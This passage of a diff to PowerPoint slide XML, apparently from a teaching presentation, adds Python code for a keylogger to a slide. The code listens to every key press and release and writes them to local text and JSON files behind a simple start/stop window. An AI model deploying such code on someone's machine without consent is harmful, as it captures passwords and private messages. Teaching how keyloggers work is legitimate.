+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>keys_used</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> = []</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>flag = False</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>keys = ""</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>def </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>generate_text_log</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>(key):</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>keys.write</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>(key)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>def </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>generate_json_file</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>keys_used</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>):</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>    with open('</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>key_log.json</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>', '+</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>wb</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>') as </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>key_log</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>key_list_bytes</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>json.dumps</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>keys_used</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>).encode()</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>key_log.write</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>key_list_bytes</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>def </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>on_press</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>(key):</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>    global flag, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>keys_used</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>, keys</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>    if flag == False:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>keys_used.append</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>(</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>            {'Pressed': f'{key}'}</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>        )</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>        flag = True</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>    if flag == True:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>        </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>keys_used.append</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>(</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>            {'Held': f'{key}'}</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>        )</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>    </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>generate_json_file</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>keys_used</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>def </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>on_release</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>(key):</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>    global flag, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>keys_used</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>, keys</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="TextBox 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03B13A99-AD2A-7DF1-F53C-AAB6F64DD42D}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5233219" y="481330"/>
+            <a:ext cx="4748981" cy="6924973"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>keys_used.append</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>        {'Released': f'{key}'}</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>    )</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>    if flag == True:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>        flag = False</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>    </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>generate_json_file</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>keys_used</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>    keys = keys + str(key)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>    </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>generate_text_log</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>(str(keys))</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>def </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>start_keylogger</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>():</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>    global listener</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>    listener = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>keyboard.Listener</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>on_press</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>on_press</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>on_release</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>on_release</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>    </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>listener.start</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>()</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>    </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>label.config</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>    </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>start_button.config</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>(state='disabled')</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>    </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>stop_button.config</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>(state='normal')</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>def </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>stop_keylogger</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>():</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>    global listener</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>    </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>listener.stop</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>()</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>    </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>label.config</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>(text="Keylogger stopped.")</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>    </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>start_button.config</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>(state='normal')</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>    </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>stop_button.config</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>(state='disabled')</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>root = Tk()</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>root.title</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>("Keylogger")</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>label.config</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>(anchor=CENTER)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
+              <a:t>label.pack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0"/>
+              <a:t>()</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1692627815"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
       <p:pic>
         <p:nvPicPr>
           <p:cNvPr id="6" name="object 6"/>
@@ -2959,7 +4916,7 @@
                 <a:latin typeface="Trebuchet MS"/>
                 <a:cs typeface="Trebuchet MS"/>
               </a:rPr>
-              <a:t>10</a:t>
+              <a:t>14</a:t>
             </a:fld>
